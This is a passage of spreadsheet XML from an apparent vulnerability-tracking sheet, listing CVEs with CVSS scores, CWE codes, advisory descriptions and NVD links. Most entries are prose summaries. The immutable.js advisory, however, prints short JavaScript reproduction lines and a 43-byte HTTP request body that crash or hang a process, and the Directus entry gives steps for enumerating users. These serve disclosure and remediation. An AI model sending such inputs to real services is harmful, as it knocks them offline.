        <v>8.800000000000001</v>
      </c>
      <c r="E248" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F248" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G248" s="5" t="inlineStr"/>
      <c r="H248" s="5" t="inlineStr"/>
      <c r="I248" s="5" t="inlineStr"/>
      <c r="J248" s="5" t="inlineStr"/>
      <c r="K248" s="5" t="inlineStr"/>
      <c r="L248" s="5" t="inlineStr"/>
      <c r="M248" s="5" t="inlineStr"/>
      <c r="N248" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O248" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P248" s="5" t="inlineStr"/>
      <c r="Q248" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="R248" s="5" t="inlineStr">
        <is>
          <t>Coze Studio through 0.5.1 fails to validate that table names in workflow SQL customization nodes belong to the caller's workspace. Authenticated attackers can enumerate predictable table identifiers and execute SQL statements against other workspaces' memory databases to read, insert, or delete data.</t>
        </is>
      </c>
      <c r="S248" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92788</t>
        </is>
      </c>
    </row>
    <row r="249">
      <c r="A249" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B249" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C249" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92796</t>
        </is>
      </c>
      <c r="D249" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E249" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F249" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G249" s="5" t="inlineStr"/>
      <c r="H249" s="5" t="inlineStr"/>
      <c r="I249" s="5" t="inlineStr"/>
      <c r="J249" s="5" t="inlineStr"/>
      <c r="K249" s="5" t="inlineStr"/>
      <c r="L249" s="5" t="inlineStr"/>
      <c r="M249" s="5" t="inlineStr"/>
      <c r="N249" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O249" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P249" s="5" t="inlineStr"/>
      <c r="Q249" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="R249" s="5" t="inlineStr">
        <is>
          <t>Manticore Search versions 27.0.0 before 28.4.4 fail to validate permissions for all statements in multi-statement SQL requests, allowing read-only users to execute unauthorized queries. Attackers can append additional SELECT statements after the first statement to read credential tables and obtain password hashes that authenticate as administrators without plaintext recovery.</t>
        </is>
      </c>
      <c r="S249" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92796</t>
        </is>
      </c>
    </row>
    <row r="250">
      <c r="A250" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B250" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C250" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92801</t>
        </is>
      </c>
      <c r="D250" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E250" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F250" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G250" s="5" t="inlineStr"/>
      <c r="H250" s="5" t="inlineStr"/>
      <c r="I250" s="5" t="inlineStr"/>
      <c r="J250" s="5" t="inlineStr"/>
      <c r="K250" s="5" t="inlineStr"/>
      <c r="L250" s="5" t="inlineStr"/>
      <c r="M250" s="5" t="inlineStr"/>
      <c r="N250" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O250" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P250" s="5" t="inlineStr"/>
      <c r="Q250" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="R250" s="5" t="inlineStr">
        <is>
          <t>cc-connect through 1.5.0 fails to enforce per-user allowlist filtering in the onCardAction handler for Feishu interactive card callbacks. Attackers can dispatch agent commands by triggering card actions in admitted chats, bypassing the per-user access controls that protect the text message handler.</t>
        </is>
      </c>
      <c r="S250" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92801</t>
        </is>
      </c>
    </row>
    <row r="251">
      <c r="A251" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B251" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C251" s="5" t="inlineStr">
        <is>
          <t>CVE-2024-39896</t>
        </is>
      </c>
      <c r="D251" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E251" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F251" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="G251" s="5" t="inlineStr"/>
      <c r="H251" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I251" s="5" t="inlineStr"/>
      <c r="J251" s="5" t="inlineStr"/>
      <c r="K251" s="5" t="inlineStr"/>
      <c r="L251" s="5" t="inlineStr">
        <is>
          <t>npm:directus</t>
        </is>
      </c>
      <c r="M251" s="5" t="inlineStr">
        <is>
          <t>10.13.0</t>
        </is>
      </c>
      <c r="N251" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="O251" s="5" t="inlineStr"/>
      <c r="P251" s="5" t="inlineStr"/>
      <c r="Q251" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="R251" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">### Impact
When relying on SSO providers in combination with local authentication it can be possible to enumerate existing SSO users in the instance. This is possible because if an email address exists in Directus and belongs to a known SSO provider then it will throw a "helpful" error that the user belongs to another provider.
### Reproduction
1. Create a user using a SSO provider `test@directus.io`.
2. Try to log-in using the regular login form (or the API)
3. When using a valid email address
| **APP** | **API** |
| --- | --- |
| ![image](https://github.com/directus/directus/assets/9389634/1da3301d-226f-46a7-bfb8-3f6fb9bc55cd) | ![image](https://github.com/directus/directus/assets/9389634/50cab310-7d1c-4241-a6be-d06542565767) |
4. When using an invalid email address
| **APP** | **API** |
| --- | --- |
| ![image](https://github.com/directus/directus/assets/9389634/7b97659e-b49c-410b-872e-e36786b6e41e) | ![image](https://github.com/directus/directus/assets/9389634/d26ccba7-bb27-437e-991e-99c10941bbe7) |
5. Using this differing error it is possible to determine whether a specific email address is present in the Directus instance as an SSO user.
### Workarounds
When only using SSO for authentication then you can work around this issue by disabling local login using the following environment variable `AUTH_DISABLE_DEFAULT="true"`
### References
Implemented as feature in https://github.com/directus/directus/pull/13184
https://owasp.org/www-project-web-security-testing-guide/v42/4-Web_Application_Security_Testing/03-Identity_Management_Testing/04-Testing_for_Account_Enumeration_and_Guessable_User_Account
</t>
        </is>
      </c>
      <c r="S251" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2024-39896</t>
        </is>
      </c>
    </row>
    <row r="252">
      <c r="A252" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B252" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C252" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-40854</t>
        </is>
      </c>
      <c r="D252" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E252" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F252" s="5" t="inlineStr">
        <is>
          <t>cvd@cert.pl</t>
        </is>
      </c>
      <c r="G252" s="5" t="inlineStr"/>
      <c r="H252" s="5" t="inlineStr"/>
      <c r="I252" s="5" t="inlineStr"/>
      <c r="J252" s="5" t="inlineStr"/>
      <c r="K252" s="5" t="inlineStr"/>
      <c r="L252" s="5" t="inlineStr"/>
      <c r="M252" s="5" t="inlineStr"/>
      <c r="N252" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O252" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P252" s="5" t="inlineStr"/>
      <c r="Q252" s="5" t="inlineStr">
        <is>
          <t>CWE-290</t>
        </is>
      </c>
      <c r="R252" s="5" t="inlineStr">
        <is>
          <t>WNC T-Mobile 5G Box IDU router contains an authentication bypass vulnerability in the portal.cgi component. The session verification mechanism improperly validates the sessionid cookie by checking for the existence of a corresponding file in /tmp/login_user. An attacker can bypass authentication by using directory entries such as "." or ".." in the cookie, allowing unauthorized access to the administration panel.This issue has been fixed in firmware version 1.1.0.651412</t>
        </is>
      </c>
      <c r="S252" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-40854</t>
        </is>
      </c>
    </row>
    <row r="253">
      <c r="A253" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B253" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C253" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-59879</t>
        </is>
      </c>
      <c r="D253" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E253" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F253" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="G253" s="5" t="inlineStr"/>
      <c r="H253" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I253" s="5" t="inlineStr"/>
      <c r="J253" s="5" t="inlineStr"/>
      <c r="K253" s="5" t="inlineStr"/>
      <c r="L253" s="5" t="inlineStr">
        <is>
          <t>npm:immutable</t>
        </is>
      </c>
      <c r="M253" s="5" t="inlineStr">
        <is>
          <t>3.8.4, 4.3.9, 5.1.8</t>
        </is>
      </c>
      <c r="N253" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="O253" s="5" t="inlineStr"/>
      <c r="P253" s="5" t="inlineStr"/>
      <c r="Q253" s="5" t="inlineStr">
        <is>
          <t>CWE-190, CWE-400, CWE-835, CWE-1284</t>
        </is>
      </c>
      <c r="R253" s="5" t="inlineStr">
        <is>
          <t>## Summary
`List#set`, `List#setSize`, `List#setIn`, `List#updateIn` (and the functional `set` / `setIn` / `updateIn`) mishandle an index or size in the range `[2 ** 30, 2 ** 31)`:
- On an **empty** `List` the operation enters an **uncatchable infinite loop** (a tight CPU spin; a surrounding `try/catch` never regains control). Only killing the worker recovers it.
- On a **populated** `List` (≥ 32 elements — i.e. any array of ≥ 32 items turned into a `List` by `fromJS`) the loop allocates without bound → heap exhaustion → the **process aborts** (`SIGABRT`, exit `134`, or kernel OOM-kill `137`). A real crash, not a recoverable error.
The index may be a **numeric string**, so it can come straight from a request body, URL, or key-path. A single small unauthenticated request is enough.
There is also a companion **silent data-corruption** issue in `setSize`:
```js
List([1, 2, 3]).setSize(2 ** 31); // before fix =&gt; size 0  (silently cleared)
List([1, 2, 3]).setSize(2 ** 32 + 5); // before fix =&gt; size 5  (huge value wraps to 5)
```
## Impact
Availability only. A reachable configuration is any endpoint that routes untrusted input into a `List` index or a `setIn`/`updateIn` key-path — which the extremely common `state = fromJS(body); state.setIn(userPath, value)` pattern does (config stores, document/collection editors, redux-immutable reducers, JSON-Patch endpoints, etc.).
No confidentiality or integrity impact, no RCE. The companion `setSize` bug can silently corrupt application state (wrong size) without crashing.
## Reproduction (immutable 5.1.7)
```ts
import { fromJS, List } from 'immutable';
// 1) Populated List: OOM -&gt; process abort (SIGABRT, exit 134) within ~2s
fromJS({ items: new Array(64).fill(0) }).setIn(['items', '1073741824'], 'x');
// 2) Empty List: hangs forever, uncatchable
List().set(2 ** 30, 'x');
// 3) Silent truncation
List([1, 2, 3]).setSize(2 ** 31); // =&gt; size 0
List([1, 2, 3]).setSize(2 ** 32 + 5); // =&gt; size 5
```
A remote 43-byte HTTP request (`{"path":["items","1073741824"],"value":"x"}`) is sufficient to abort a worker that applies it via `state = state.setIn(path, value)`.
Any index in `[2 ** 30, 2 ** 31)` works (`1073741824`, `2000000000`, …). An index in `[2 ** 31, 2 ** 32)` does not crash — it silently wraps (clearing the List) via the same root cause.
## Root cause
`List` stores its values in a 32-wide trie (`SHIFT = 5`, so each level addresses 5 more bits) and uses **signed 32-bit bitwise arithmetic** throughout `setListBounds()` (`src/List.js`):
1. **Infinite loop (the hang / OOM).** The level-raising loop
```js
while (newTailOffset &gt;= 1 &lt;&lt; (newLevel + SHIFT)) {
  newRoot = new VNode(
    newRoot &amp;&amp; newRoot.array.length ? [newRoot] : [],
    owner
  );
  newLevel += SHIFT;
}
```
relies on `1 &lt;&lt; (newLevel + SHIFT)`. A JavaScript shift count is taken **mod 32**, so once `newLevel + SHIFT` reaches `31` the term goes **negative** (`1 &lt;&lt; 31 === -2147483648`) and at `32` wraps to `1` (`1 &lt;&lt; 35 === 8`). The comparison then stays `true` forever and the loop never terminates. On a populated `List`, each iteration retains a new `VNode` (`[newRoot]`), so the heap fills and V8 aborts; on an empty `List` it spins on CPU without allocating.
2. **Silent wraparound (the `setSize` corruption).** The `begin |= 0` / `end |= 0` coercion (`ToInt32`) silently wraps large finite values (`(2 ** 31) | 0 === -2147483648`, `(2 ** 32 + 5) | 0 === 5`), producing a wrong resulting size instead of an error.
The threshold is `2 ** 30`: that is the largest size for which `1 &lt;&lt; (newLevel + SHIFT)` stays a valid positive 32-bit integer throughout the loops (`newLevel + SHIFT` stays ≤ 30).
## Remediation
The fix is contained to `setListBounds()` in `src/List.js`:
1. **Validate up front, before the lossy `| 0` coercion.** Compute the intended origin and capacity in full precision and throw a clear, catchable `RangeError` when they exceed the addressable range (`MAX_LIST_SIZE = 2 ** 30`). `Infinity`/`NaN` are left to the existing `| 0 → 0` behaviour (so `setSize(Infinity)` stays `0` and `slice(0, Infinity)` still means "to the end").
2. **Stop the shift from wrapping.** Replace `1 &lt;&lt; exp` in the level-raising loops with a helper that uses the cheap bitwise shift while it is exact (`exp ≤ 30`, the common path including every `push`/`setSize`/`slice`) and falls back to the non-wrapping `2 ** exp` only for the rare deep trees reached when a negative origin (`unshift` / negative index) is normalized to a large positive capacity (`exp` can reach 35 there, where `1 &lt;&lt; 35` would wrap to 8).
This turns every hang, the misleading `"Maximum call stack size exceeded"`, the OOM/`SIGABRT`, and the silent `setSize` truncation into one descriptive `RangeError`, preserves all behaviour for sizes `&lt; 2 ** 30`, and keeps the hot `push` path on the fast bitwise shift (the `2 ** exp` branch is never reached by non-negative operations).
### Is the new limit a breaking change?
No working code is affected. A `List` could never actually hold `≥ 2 ** 30` values before — the attempt hung, crashed, or silently corrupted the size. The limit was already implicit in the 32-bit trie; the fix only makes it explicit and catchable, mirroring native JS arrays (`new Array(2 ** 32)` → `RangeError: Invalid array length`). The single observable behaviour change is that `setSize(hugeValue)`, which used to return a silently wrong size, now throws. `2 ** 30` ≈ 1.07 billion entries (~8 GB of pointers alone), far beyond any practical use.
## Mitigations (for users who cannot upgrade immediately)
- Validate/clamp any externally supplied `List` index or `setIn`/`updateIn` key-path segment against a sane maximum before passing it to immutable.
- Reject numeric path segments `≥ 2 ** 30`.
- Run request handling in a worker that can be restarted, and cap the heap (`--max-old-space-size`) so an abort is contained.</t>
        </is>
      </c>
      <c r="S253" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-59879</t>
        </is>
      </c>
    </row>
    <row r="254">
      <c r="A254" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B254" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C254" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73174</t>
        </is>
      </c>
      <c r="D254" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E254" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F254" s="5" t="inlineStr">
        <is>
          <t>prodsec@nozominetworks.com</t>
        </is>
      </c>
      <c r="G254" s="5" t="inlineStr"/>
      <c r="H254" s="5" t="inlineStr"/>
      <c r="I254" s="5" t="inlineStr"/>
      <c r="J254" s="5" t="inlineStr"/>
      <c r="K254" s="5" t="inlineStr"/>
      <c r="L254" s="5" t="inlineStr"/>
      <c r="M254" s="5" t="inlineStr"/>
      <c r="N254" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O254" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P254" s="5" t="inlineStr"/>
      <c r="Q254" s="5" t="inlineStr">
        <is>
          <t>CWE-319</t>
        </is>
      </c>
      <c r="R254" s="5" t="inlineStr">
        <is>
          <t>Nozomi Networks Labs identified a CWE-319: Cleartext Transmission of Sensitive Information vulnerability in the edgserver management protocol of Advantech EKI-1242EIMS in firmware version V1.06.01 that allows a network-adjacent passive observer to intercept management traffic and recover sensitive device identity and network metadata in cleartext.</t>
        </is>
      </c>
      <c r="S254" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73174</t>
        </is>
      </c>
    </row>
    <row r="255">
      <c r="A255" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B255" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C255" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73464</t>
        </is>
      </c>
      <c r="D255" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E255" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F255" s="5" t="inlineStr">
        <is>
          <t>psirt@arista.com</t>
        </is>
      </c>
      <c r="G255" s="5" t="inlineStr"/>
      <c r="H255" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I255" s="5" t="inlineStr"/>
      <c r="J255" s="5" t="inlineStr"/>
      <c r="K255" s="5" t="inlineStr"/>
      <c r="L255" s="5" t="inlineStr"/>
      <c r="M255" s="5" t="inlineStr"/>
      <c r="N255" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O255" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P255" s="5" t="inlineStr"/>
      <c r="Q255" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="R255" s="5" t="inlineStr">
        <is>
          <t>On affected platforms running Arista EOS with gRPC Network Management Interface (gNMI) enabled, a specially crafted request could allow a malicious authenticated client with gRPC Network Management Interface (gNMI) access to execute arbitrary code with root privileges on the switch.</t>
        </is>
      </c>
      <c r="S255" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73464</t>
        </is>
      </c>
    </row>
    <row r="256">
      <c r="A256" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B256" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C256" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75516</t>
        </is>
      </c>
      <c r="D256" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E256" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F256" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G256" s="5" t="inlineStr"/>
      <c r="H256" s="5" t="inlineStr"/>
      <c r="I256" s="5" t="inlineStr"/>
      <c r="J256" s="5" t="inlineStr"/>
      <c r="K256" s="5" t="inlineStr"/>
      <c r="L256" s="5" t="inlineStr"/>
      <c r="M256" s="5" t="inlineStr"/>
      <c r="N256" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O256" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P256" s="5" t="inlineStr"/>
      <c r="Q256" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="R256" s="5" t="inlineStr">
        <is>
          <t>The RabbitMQ Java client library allows Java and JVM-based applications to connect to and interact with RabbitMQ nodes. Prior to 5.34.0, AMQConnection.start() applies Math.min(maxInboundMessageBodySize, frameMax) after Connection.Tune negotiation even though AMQP defines frameMax value zero as unlimited and ConnectionFactory.DEFAULT_FRAME_MAX is zero. When the client default and server-negotiated value are both zero, the result is passed to Utils.framePayloadLimit(int), which interprets zero as Integer.MAX_VALUE and disables the configured maxInboundMessageBodySize cap. A malicious AMQP server, or a man-in-the-middle attacker able to modify Connection.Tune and inject frames into the connection, can then send an oversized frame of any frame type, causing Frame.readFrom() to allocate a large byte array before content-level validation and potentially terminate the client process through memory exhaustion. This issue is fixed in version 5.34.0.</t>
        </is>
      </c>
      <c r="S256" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75516</t>
        </is>
      </c>
    </row>
    <row r="257">
      <c r="A257" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B257" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C257" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77404</t>
        </is>
      </c>
      <c r="D257" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E257" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F257" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G257" s="5" t="inlineStr"/>
      <c r="H257" s="5" t="inlineStr"/>
      <c r="I257" s="5" t="inlineStr"/>
      <c r="J257" s="5" t="inlineStr"/>
      <c r="K257" s="5" t="inlineStr"/>
      <c r="L257" s="5" t="inlineStr"/>
      <c r="M257" s="5" t="inlineStr"/>
      <c r="N257" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O257" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P257" s="5" t="inlineStr"/>
      <c r="Q257" s="5" t="inlineStr">
        <is>
          <t>CWE-116</t>
        </is>
      </c>
      <c r="R257" s="5" t="inlineStr">
        <is>
          <t>RabbitMQ amqp091-go is a Go AMQP 0.9.1 client. Prior to 1.13.0, URI.String in uri.go concatenates CertFile, KeyFile, CACertFile, and ServerName values directly into an AMQPS query string instead of encoding them as URL query parameters with url.Values. If an application accepts a TLS asset path containing ampersand or equals delimiters and later reparses the serialized URI with ParseURI, the embedded delimiters can create or overwrite connection options, including paths to TLS certificate, key, or CA files. This can corrupt connection configuration or select unintended local cryptographic assets. This issue is fixed in version 1.13.0.</t>
        </is>
      </c>
      <c r="S257" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77404</t>
        </is>
      </c>
    </row>
    <row r="258">
      <c r="A258" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B258" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C258" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82028</t>
        </is>
      </c>
      <c r="D258" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E258" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F258" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G258" s="5" t="inlineStr"/>
      <c r="H258" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I258" s="5" t="inlineStr"/>
      <c r="J258" s="5" t="inlineStr">
        <is>
          <t>postgresql</t>
        </is>
      </c>
      <c r="K258" s="5" t="inlineStr"/>
      <c r="L258" s="5" t="inlineStr"/>
      <c r="M258" s="5" t="inlineStr"/>
      <c r="N258" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O258" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P258" s="5" t="inlineStr"/>
      <c r="Q258" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="R258" s="5" t="inlineStr">
        <is>
          <t>Magistrala before 1.0.0 contains a SQL injection vulnerability in the timescale-reader and postgres-reader HTTP API services that allows authenticated attackers to inject arbitrary SQL by supplying a malicious format query parameter that is interpolated directly into the FROM clause without parameterization or identifier quoting. Attackers with a self-registered account can substitute arbitrary subqueries to achieve cross-tenant database reads, extract pg_shadow password hashes, read and write arbitrary files, and execute arbitrary code as the postgres OS user by loading attacker-supplied shared objects, with all injected SQL executing at superuser privilege due to the default PostgreSQL role configuration.</t>
        </is>
      </c>
      <c r="S258" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82028</t>
        </is>
      </c>
    </row>
    <row r="259">
      <c r="A259" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B259" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C259" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82064</t>
        </is>
      </c>
      <c r="D259" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E259" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F259" s="5" t="inlineStr">
        <is>
          <t>cna@mongodb.com</t>
        </is>
      </c>
      <c r="G259" s="5" t="inlineStr"/>
      <c r="H259" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I259" s="5" t="inlineStr"/>
      <c r="J259" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="K259" s="5" t="inlineStr">
        <is>
          <t>mongodb:mongodb</t>
        </is>
      </c>
      <c r="L259" s="5" t="inlineStr"/>
      <c r="M259" s="5" t="inlineStr"/>
      <c r="N259" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O259" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P259" s="5" t="inlineStr"/>
      <c r="Q259" s="5" t="inlineStr">
        <is>
          <t>CWE-617</t>
        </is>
      </c>
      <c r="R259" s="5" t="inlineStr">
        <is>
          <t>A security issue in MongoDB Server allows an unauthenticated network user to cause a denial of service on a specific type of replica set member. The server contains an assertion in its read concern processing logic that can be reached without authentication, and the assertion's assumptions about internal state do not hold for all member configurations, causing the server process to terminate.</t>
        </is>
      </c>
      <c r="S259" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82064</t>
        </is>
      </c>
    </row>
    <row r="260">
      <c r="A260" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B260" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C260" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82075</t>
        </is>
      </c>
      <c r="D260" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E260" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F260" s="5" t="inlineStr">
        <is>
          <t>cna@mongodb.com</t>
        </is>
      </c>
      <c r="G260" s="5" t="inlineStr"/>
      <c r="H260" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I260" s="5" t="inlineStr"/>
      <c r="J260" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="K260" s="5" t="inlineStr">
        <is>
          <t>mongodb:mongodb</t>
        </is>
      </c>
      <c r="L260" s="5" t="inlineStr"/>
      <c r="M260" s="5" t="inlineStr"/>
      <c r="N260" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O260" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P260" s="5" t="inlineStr"/>
      <c r="Q260" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="R260" s="5" t="inlineStr">
        <is>
          <t>An uncontrolled resource consumption weakness exists in the request-handling path of the MongoDB sharded-cluster router process. A client that has network access to a router port and has not authenticated can supply connection-monitoring parameters that cause the server to expend CPU resources without any rate limiting, degrading or denying service to legitimate clients. No authentication, elevated privileges, or user interaction is required. Only availability is affected; data confidentiality and integrity are not impacted.</t>
        </is>
      </c>
      <c r="S260" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82075</t>
        </is>
      </c>
    </row>
    <row r="261">
      <c r="A261" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B261" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C261" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82410</t>
        </is>
      </c>
      <c r="D261" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E261" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F261" s="5" t="inlineStr">
